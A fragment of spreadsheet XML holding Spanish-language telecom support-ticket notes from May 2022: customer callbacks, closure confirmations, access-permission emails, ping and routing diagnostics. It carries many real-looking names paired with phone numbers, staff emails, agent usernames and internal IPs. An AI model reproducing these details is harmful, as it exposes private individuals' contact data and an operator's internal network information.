    <t xml:space="preserve">
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN INGRESA LA LLAMADA AL IVR
SE LLAMA A DID 22436500 TAMBIEN COMPLETAN LAS LLAMADAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>NOS ENVIA A BUZON DIRECTO DESPUES DE DOS INTENTOS, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE MILCO ARESTI 59221507 NO  RESPONDE, SE INTENTARA LUEGO
-ID 1001183421</t>
  </si>
  <si>
    <t>F4571363</t>
  </si>
  <si>
    <t>NO SE VALIDA QUE EL CLIENTE TENGA PENDIENTE REALIZAR ALGUNA PRUEBA, SE MUEVE A WIP EN CASO DE TENER ALGO PENDIENTE EL CLIENTE, INDICARNOS PARA NO MOVERLO Y VALIDAR APOYAR CON EL PR SI ES NECESARIO. SE CAMBIO A TRABAJO EN CURSO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO CERRANO 41706143 MENCIONA QUE ESTARA RESPONDIENDO EL CORREO CON LOS PERMISOS AUTORIZADOS
-ID 1001271052</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HEBER INDICA QUE APOYARA REALIZANDO PRUEBAS SE LE EXPONE EL CASO. SOLICITA LLAMADA EN 30 MINUTOS O 45 MINUTOS YA QUE SE DIRIGE A LUGAR--</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO CERRANO 41706143 MENCIONA QUE ESTARA VALIDANDO PORQUE YA SE TENIAN AUTORIZADOS LOS PERMISOS, CLIENTE SOLICITA LLAMADA EN 10 MIN
-ID 1001574195</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO CERRANO 41706143 MENCIONA QUE PR YA CUENTA CON EL CORREO DE LOS PERMISOS PARA PERMITIR EL ACCESO A PERSONAL TECNICO
-ID 1001578427</t>
  </si>
  <si>
    <t>SE ENVIA  CORREO A CLIENTE PARA GESTION DE PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 14:58
PARA: SOPORTE@GRUPOSERMESA.COM &lt;SOPORTE@GRUPOSERMESA.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS || SERVICIOS MEDICOS Y HOSPITALARIOS ESKALA S.A. || 487100001T || SD1127582
BUEN DÍA
   SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO
A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIA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ADJUNTO INFORMACIÓN DE QUIENES PUEDEN SER ASIGNADOS A LA REVISIÓN Y RESOLUCIÓN DE FALLA, CABE MENCIONAR QUE CUALQUIERA DE LAS PERSONAS MENCIONADAS PUEDE ATENDER LA FALLA, DE ACUERDO A LA DISPONIBILIDAD FAVOR INFORMAR DÍA Y HORA AUTORIZADOS PARA EL ACCESO Y AL MISMO TIEMPO INFORMAR A ENCARGADOS DE BRINDAR ACCESO PARA AGILIZAR LOS PROCESOS.
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4571364</t>
  </si>
  <si>
    <t>SE NOTIFICA ALARMA EN EL MONITOREO PROACTIVO, CAIDA TOTAL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71364
ID:  245700047T
IDENTIFICADOR DEL CLIENTE:  CC_FUNDGENESIS_GT_MELCHOR_MENCOS_040
UBICADO EN:  BRO EL CENTRO C. PRINCIPAL A UN COSTADO DEL JUZGADO DE PAZ MELCHOR DE MENCOS
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4571368</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 20:07
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE MAXI PALI CIUDAD SANDINO ID: ID-4879546
BUENAS TARDES ESTIMADOS:
COMO PARTE DEL SEGUIMIENTO AL CASO MAXI PALI CIUDAD SANDINO, SOLICITAMOS DE SU AMABLE APOYO PARA VALIDAR SI AÚN PERSISTEN LOS INCONVENIENTES PLANTEADOS. POR EL MOMENTO SE OBSERVA SERVICIO ACTIVO ALCANZABLE A NIVEL DE PING. GRACIAS DE ANTEMANO. SALUDOS CORDIALES.
RP/0/RSP0/CPU0:MAMANILPN1D1BED1#PING VRF MPLS_CSU2 10.15.7.226 COUNT 500 SIZE 1450
FRI MAY 20 20:04:29.211 GMT
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 500, 1450-BYTE ICMP ECHOS TO 10.15.7.226, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (500/500), ROUND-TRIP MIN/AVG/MAX = 1/1/27 MS</t>
  </si>
  <si>
    <t>F4571371</t>
  </si>
  <si>
    <t xml:space="preserve">
SE CONSULTA A PERSONAL DE MONITOREO DE BANCO AZTECA SOBRE EL ESTADO DE LA AGENCIA
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN ELEKTRADATOS 10.72.102.108
  PING 10.72.102.108: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.102.108 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.6
DISPLAY IP ROUTING-TABLE VPN-INSTANCE ELEKTRADATOS 10.72.102.108
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : ELEKTRADATOS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.72.102.96/28  DIRECT  0    0             D   10.72.102.97    VLANIF339			</t>
  </si>
  <si>
    <t>F4571378</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE  CARLOS MAZARIEGOS 59232662 CONFIRMA QUE EL SERVICIO ESTA ACTIVO, SE PROCEDE AL CIERRE DEL TICKET
1001201989
COLA:
NOMBRE: A: 59232662
NÚMERO: 59232662
ESTADO: CONECTADA
DURACIÓN: 0:00:19
DETALLES: 59232662
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 20/05/2022 13:21:26</t>
  </si>
  <si>
    <t>F4571382</t>
  </si>
  <si>
    <t>SE LE LLAMA AL PR CRISTIAN MORALES AL 24210880 EXT 129 ID 1001142182 ATIENDE VIRGINIA ESCOBEDO  SE LE  BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE AUN NO LO HA ENVIADO Y COMENTA QUE NO LE BRINDARON ESTE DATO, SE LE EXPLICA LO QUE APARECE EN LA CRONOLOGÍA Y COMENTA QUE NO FUE ASI, SE LE INDICA QUE DEPARTE DE CLARO TODO ESTA BIEN Y SI LO VALIDA OK NO PUEDE CONFIRMAR EL CIERRE Y ESTA DE ACUERDO EN EL CIERRE DEL TICKET SE LE NOTIFICA AL GESTOR FRANCISCO.QUEZADA VÍA SKYPE PARA EL CIERRE VALIDAR CIERRE DE TICKET CON LA SD</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN MORALES 24210880 EXT 129  MENCIONA QUE PERSISTE EL INCONVENIENTE, SE SOLICITA PUEDA COMPARTIR POR CORREO LAS PRUEBAS YA QUE A NIVEL DE CLARO SE OBSERVA EL SERVICIO OPERATIVO Y ESTABLE
-ID 1001152784</t>
  </si>
  <si>
    <t>F4571397</t>
  </si>
  <si>
    <t>NO SE VALIDA LA COLA DE CORREO QUE TENGAMOS COPIA, POR TAL RAZÓN SE CONTACTA  CON CRISTIAN MORALES  EL 24210880 ETX 129 ID 1001217032 Y COMENTA QUE YA VE TODO OPERATIVO Y SE PUEDE PROCEDER CON EL CIERRE DE LA FALLA, SE NOTIFICA AL GESTOR SAMUEL.ESTRADAG VÍA SKYPE EL CAMBIO CERRAR TICKER MEDIANTE LA SD</t>
  </si>
  <si>
    <t>F4571407</t>
  </si>
  <si>
    <t xml:space="preserve"> BRENDA ESQUIT-23347365 SE TIENE  ALICNET EEN LINEA ##VIVO</t>
  </si>
  <si>
    <t>SE LE COMENTA A CLIENTE  BRENDA ESQUIT-23347365  SOBRE LO QUE RSE REALIZO CON SEÑORITA NANCY Y OCNFIRMA QUE LO QUE REPORTA ES INTERMITENCIA EN LLAMADAS SALIENTES ## AL MOMENTO DE REALIZAR UNA PRUEBA CON SEÑORITA BFRENDA, SERVICIO RESTABLECE ##CLIENTE PIDE SE HABE CON SU PERSONAL DE IT ## NOS COMUNICA A  SR ##PEDRO CABRERA# Y SE LE COMENTA TODO LO ANTERIO + QUE SE DETERMINA QUE PBX NECESITA UNA REVISION  Y VERIFICACION POR PARTE DE SU SOPORTE DE PLANTA DEBIDO A QUE LA MISMA PBX NO ESTA SACANDO LAS LLAMADAS ## CLIENTE ENTERADO, SE PROCEDE AL CIERRE ##VIVO</t>
  </si>
  <si>
    <t>SE CAMBIA ETPA- SE LLAMO AL GDN Y CONCTESTO SEÑORITA NANCY, CMENTA QE ALGUNAS VECES NO TIENE LLAAMDAS SALIENTES- SE REALIZO UNA TRAZA YSE LE PIDIO QUE REALIZRA LALAMADAS SALIENTES (REALIZO 2) PERO NO SE OBSERVA EN ATHRA QUE LA PBX NOS MANDE LA LLAMADA ## POR LOQ UE SE PASA A PC PARA INFORMARLE A LA PERSONA QEUUE APERTURO TICKET ##VIVO</t>
  </si>
  <si>
    <t>F4571408</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ALEJANDRA SANCHEZ 55751494 CLIENTE INDICA QUE NO SE ENCUENTRA EN SUS INSTALACIONES PARA HACER PRUEBAS, SOLICITA SE LE LLAME A A PARTIR DE LAS 2 PM. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4571411</t>
  </si>
  <si>
    <t>SE CONTACTA CON EJECUTIVA ANGELICA VAQUERO 79878779 PARA VALIDAR SI SE PUEDE PROCEDER CON EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN DA TONO DE LLAMADA E INGRESA AL IVR
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANGELICA VAQUERO 79878779 QUIEN NOS INDICA QUE ES LA COMERCIAL DEL CLIENTE, COMENTA QUE CLIENTE LE REPORTO PROBLEMAS CON LLAMADAS EXTERNAS SALIENTES Y ENTRANTES PERO QUE EL SERVICIO RESTABLECIO, COMENTA QUE SE QUEDARON 20 MIN SIN SERVICIO.
SIN EMBARGO SE LE EXPLICA LA HORA QUE CAYO EL REPORTE Y LA HORA QUE ACTUALMENTE ES Y EL SERVICIO NO HA PRESENTADO ALGUNA ALARMA DE DESCONEXION O CAIDA, SE REALIZARON PRUEBAS CON SARA Y NOS CONFIRMA TODO OPERATIVO.
ANGELICA SOLICITA QUE SE MANTENGA EL SERVICIO EN PRUEBAS Y QUE SE CONFIRME EN LA TARDE CON EL CLIENTE ALREDEDOR DE LAS 14:00 HRS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SARA NOS ATIENDE QUIEN CONFIRMA QUE NO HAN PRESENTADO PROBLEMAS, SE REALIZA LLAMADA SALIENTE Y COMPLETAN
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SERVICIO PERMANECE ACTIVO
SE LLAMA AL GDN INGRESA AL IVR
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>PERO NOS MANDA DIRECTO A BUZON DESPUES DE VARIOS INTENTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4571440</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MERCEDES ROMERO - 25721999 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001249391 - 1001249462</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MERCEDES ROMERO - 25721999  RESPONDE  SEÑORITA ( NO BRINDA NOMBRE) INDICA QUE MERCEDES ROMERO NO SE ENCUENTRA EN  PR POR LO QUE SOLICITA LLAMADA  EN 20 MIN
-ID 1001239390</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE JUAN 58657367 MENCIONA QUE NO SE ENCUENTRA MERCEDES ROMERO - 25721999
-ID 1001238382</t>
  </si>
  <si>
    <t>F4571451</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE HABLO CON EL CLIENTE VINA HOLA, QUIEN INDICA QUE NO HAY NINGUN INCONVENIENTE CON EL SERVICIO Y QUE SE PROCEDA CON EL CIERRE.
1001228306
COLA:
NOMBRE: A: 79554200
NÚMERO: 79554200
DURACIÓN: 0:00:04
ESTADO: MARCANDO
DETALLES: 79554200
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/05/2022 14:43:20</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN CONTESTA SRITA DE RECEPCION- COMETNA QUE NO HA TENIDO ININGUN TIPO DE INCONVENIENTE CON EL SERVICO ##INDICA QUE TIENE LLAMADAS ENTRANTES Y SLIENTES ##
1001170255
COLA:
NOMBRE: A: 79554200
NÚMERO: 79554200
DURACIÓN: 0:01:06
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 79554200
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 20/05/2022 11:53:59</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE VINSI BASQUES-30293691 ENVIA A BUZON 3 VECES ## SE INTENTARA NUEVAMENTE EN BREVE ## ACTUALMENTE SERVIICO UP ## SE HA MONITOREADO POR MAS DE 2 HORAS Y TODO OK ## CLIENTE NO CONTESTA##
1001209289
COLA:
NOMBRE: A: 30293691
NÚMERO: 55280199
DURACIÓN: 0:00:28
ESTADO: CONECTADA
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 20/05/2022 13:43:23
1001209444
COLA:
NOMBRE: A: 55280199
NÚMERO: 55280199
DURACIÓN: 0:00:05
ESTADO: MARCANDO
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 20/05/2022 13:43:31
1001209541
COLA:
NOMBRE: A: 30293691
NÚMERO: 55280199
DURACIÓN: 0:00:26
ESTADO: CONECTADA
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 20/05/2022 13:44:08</t>
  </si>
  <si>
    <t>F4571454</t>
  </si>
  <si>
    <t>CLIENTE INFORMA QUE ESTE PUNTO DE ZONA 9 SE CONECTA A LA CENTRAL EN ZONA 10 ID:465300014, INFORMA QUE POR MEDIO DEL ENLACE CENTRAL LE PROPORCIONA INTERNET PERO QUE ESTE PUNTO EN ZONA 9 AL REALIZAR UN SPEED TEST LLEGA A 10 MEGAS DE SUBIDA PERO SOLO A 4 MEGAS DE BAJADA.</t>
  </si>
  <si>
    <t>SE ENVIO CORREO CON LA EVIDENCIA,
RE: EVIDENCIA PRUEBAS DE ANCHO DE BANDA SD1125995 || 465300016 || TECH TRADE S.A.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JULIO BARRERA 56300178 ACTUALMENTE EN LLAMADA ...</t>
  </si>
  <si>
    <t>SE LE SOLICITA ENVIAR TRAFICO A ESTE ENLACE PROCEDE CON PRUEBAS, TOMAR EN CUENTA QUE A NIVEL DE CLARO NO SE OBSERVA ALGUN PROBLEMA CON LA RUTA, ESTE ENLACE TIENE SU POLICITA EN LA OLT A 10 MEGAS ...</t>
  </si>
  <si>
    <t>F4571462</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MIGUEL ERAZO 70709265 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001248213</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL ERAZO 70709265 MENCIONA QUE ESTAN REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA PARA LAS 15:30
-ID 1001222191</t>
  </si>
  <si>
    <t>F4571521</t>
  </si>
  <si>
    <t>ACTUALMENTE EN AUDIO CON CLIENTE SR. JULIO DE LA F4571454
1001178004
COLA:
NOMBRE: TO: 56300178
NÚMERO: 56300178
DURACIÓN: 0:17:41
ESTADO: CONECTADA
DETALLES: 56300178
PROCESO ASOCIADO:
IC SERVER: CEN-GT-CIC-02
IC USER: MIGUELRODRIGUEZ
LOCAL DATE/TIME: 5/20/2022 12:31:43 PM</t>
  </si>
  <si>
    <t>ESTIMADOS FAVOR SU APOYO VALIDANDO MEDIANTE SD UNICAMENTE SE ENCONTRA REGISTROS DE SATURACION
SE ENVIA CORREO A CLIENTE:
ASUNTO: EVIDENCIAS DE SATURACIÓN 947700001 || INGOP</t>
  </si>
  <si>
    <t>F4571525</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE HERNAN AVILA 33908341  NO RESPONDE, SE INTENTARA LUEGO
-ID 1001221518</t>
  </si>
  <si>
    <t>F4571540</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, PROBLEMAS CON EQUIPO FORTINET, SEGUIMIENTO HASTA EL DÍA LUNES A PARTIR DE LAS 08:00AM.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  LIC. ADRIAN PINEDA AL 2415-6815 RESPONDE LA SEÑORITA KIMBERLI E INDICA QUE ESTA EN OTRA LLAMADA Y NO PUEDE ATENDER QUE SE LE LLAME LUEGO **
ID 1001661009
**</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A CLIENTE PARA SOLICITARLE MAS DETALLES DE LO SOLICITADO PERO NO RESPONDE
2415-6815</t>
  </si>
  <si>
    <t>SE LLAMA A ADRIAN ATIENDE OTRA PERSONA INDICA QUE DESCONOCE MOTIVO DE REPORTE Y NO CUENTAN CON MAS DETALLES. INDICA QUE SE LLAME EL DIA LUNES PARA SEGUIMIENTO CON ADRIAN. A LAS 8:00 HORAS---</t>
  </si>
  <si>
    <t>**SE LLAMA A LIC. ADRIAN PINEDA AL 24156815 CONTESTA LA RECEPCIONISTA INDICA QUE CLIENTE NO SE ENCUENTRA EN SU LUGAR QUE SE LE LLAME MAÑANA A PARTIR DE LAS 8:30 AM **
ID 1001749178
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  LIC. ADRIAN PINEDA AL 2415-6815 RESPONDE LA SEÑORITA KIMBERLI E INDICA QUE SE LE LLAME A CLIENTE EN 30 MIN YA QUE SE ENCUENTRA EN UNA REUNION**
ID 1001571799
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  LIC. ADRIAN PINEDA AL 2415-6815 RESPONDE LA SEÑORITA KIMBERLI E INDICA LO MISMO QUE SE LE LLAME A CLIENTE EN 30 MIN YA QUE SE ENCUENTRA EN UNA REUNION **
ID 1001601742
**</t>
  </si>
  <si>
    <t>F4571544</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A JORGE PACAY/CLIENTE; SE LE PIDE APOYO A VALIDAR EL TEMA DE ENERGÍA ELÉCTRICA EN PR, INDICA QUE HABLARÁ CON SU PR Y LLAMARÁ DE NUEVO, ADICIONAL DEL LADO CLARO SE VERIFICARÁ LA CELDA A NIVEL DE TX.</t>
  </si>
  <si>
    <t>F4571558</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EMIS FRANCO 78376863 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001573163</t>
  </si>
  <si>
    <t>F4571560</t>
  </si>
  <si>
    <t>CLEINTE HA REALIZADO PRUEBAS Y VALIDA SERVICIO ###
1001201587
COLA:
NOMBRE: A: 54554709
NÚMERO: 54554709
DURACIÓN: 0:07:31
ESTADO: CONECTADA
DETALLES: 54554709
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 20/05/2022 13:28:00</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA LUIS DAVILA-54554709 ||  INDICA QUE REALIZARA PRUEBAS ##
1001190101
COLA:
NOMBRE: A: 54554709
NÚMERO: 54554709
DURACIÓN: 0:01:28
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 54554709
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 20/05/2022 12:48:51</t>
  </si>
  <si>
    <t>F4571562</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA
DE: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 15:04
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; MIGUEL GUERRA &lt;SOPORTETECNICO@SALASVIPCLUBHN.COM&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; ANDREA ZUNIGA &lt;ANDREAZUNIGA@SALASVIPCLUBHN.COM&gt;; MARIA VIDEZ &lt;MARIA@SALASVIPCLUBHN.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;
ASUNTO: RE: REVISAR MERAKI
BUENAS TARDES ESTIMADOS;
UN GUSTO SALUDARLES, DANDO SEGUIMIENTO AL CASO LE INFORMAMOS QUE LUEGO DE LAS REVISIONES A NIVEL LÓGICO EL SERVICIO SE OBSERVA SIN INCONVENIENTES POR PARTE DE CLARO, FAVOR SU APOYO INDICANDO SI SIGUEN OBSERVANDO EL MISMO COMPORTAMIENTO CON EL SERVICIO REPORTADO
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4571566</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO BARRERA 56300178 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001222981</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. SERGIO BARRERA 56300178  INFORMA QUE ESTA EN SU HORA DE ALMUERZO, ENVIARA LA SERIE DE LA ONT GPON VIA WHATSAPP EN APROX 15 MINS.
CAMBIO 4436418, NÚM. DE OT:T793095</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. SERGIO BARRERA 56300178 INFORMA QUE REALIZARA PRUEBAS, SOLICITA NO CERRAR EL INCIDENTE, HASTA MAÑANA POR LA TARDE.  ID: 1001768497</t>
  </si>
  <si>
    <t>F4571577</t>
  </si>
  <si>
    <t>SE LE LLAMA KEREN SANDOVAL 59459804 ID: 1001239350
COMENTA QUE EL SERVICIO ESTA OK, AUTORIZA CIERRE DE INCIDENTE, SE TERMINARA DE VALIDAR MEDIANTE SD
SE NOTIFICA A ALEJANDRO.NAVARRO VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4571578</t>
  </si>
  <si>
    <t>SE BSUCA CONTACTO CON PR EN CASOS ANTERIORES OSCAR VILLATORO 4211-1458 PERO NO CONTESTA</t>
  </si>
  <si>
    <t>F4571582</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE, INDICA QUE NO POSEE SERVICIO DE INTERNET, SE SOLICITA CONECTARASE HACIA EL CPE DIRECTAMENTE, LUEGO PARA VERIFICAR CONFIGURACION DE LA PC, SE SOLICITA CAPTURA DE PANTALLA AL WHATSAPP DE N1 CLARO 42105135, LUEGO SE CORTA LA LLAMADA PERO SE LE ENVIAR MENSAJE DE SOLICITUD VIA WHATSAPP, SE QUEDA A ESPERA DE RESPUESTA.
1001220639
COLA:
NOMBRE: A: 0050432675009
NÚMERO: 0050432675009
DURACIÓN: 0:10:08
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NORMAL, ESPECIFICADA (CÓDIGO CAUSA ISDN31)]
DETALLES: 0050432675009
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 20/05/2022 14:31:17</t>
  </si>
  <si>
    <t>SE LE INDICA AL CLIENTE LAS IPS A CONFIGURAR Y SE OBSERVA QUE CLIENTE TIENE NAVEGACION, SIN EMBARGO MENCIONA QUE NO TIENE ACCESO MEDIANTE WIFI, PERO EL ROUTER QUE GENERA WIFI ES NO ES GESTIONADO POR CLARO Y DE MARCA TENDA, POR LO QUE EL INCONVENIENTE ES INTERNO, DEBIDO A QUE VIA TELEFONICA NO SE ESCUCHABA CLARAMENTE, SE VALIDARA LUEGO EL CIERRE DE CASO.
NÚMERO: 0050432675009
FIN: HOY, 15:08
ID DE LLAMADA: 1001235454</t>
  </si>
  <si>
    <t>F4571590</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET A CNOC CLARO VÍA SKYPE A LO DICHO POR CLIENTE EN CORREO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JOSE FUENTES AL 23386801 EXT.: 32320 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001662127
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JOSE FUENTES AL 23386801 EXT.: 32320 CONTESTA LA SEÑORITA DANIA Y SOLICITA QUE SE LE LLAME A LA 8:30 AM YA QUE A ESA HORA SE ENCUENTRA EL SEÑOR JOSE**
ID 1001555565
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JOSE FUENTES AL 23386801 EXT.: 32320 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001600424
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JOSE FUENTES AL 23386801 EXT.: 32320 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001569336
**</t>
  </si>
  <si>
    <t>F4571594</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LENIN CUADRA AL 78439832  SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
ID 1001568152
**</t>
  </si>
  <si>
    <t>F4571600</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE MIRIAM 31686582  QUIEN  CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001217360 - 1001218808</t>
  </si>
  <si>
    <t>F4571642</t>
  </si>
  <si>
    <t>NO SE TIENE AÚN REPUESTO EN CAMPO, ENLACE FUNCIONA POR WA</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN ELIAS SIERRA 50494560221 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001195033</t>
  </si>
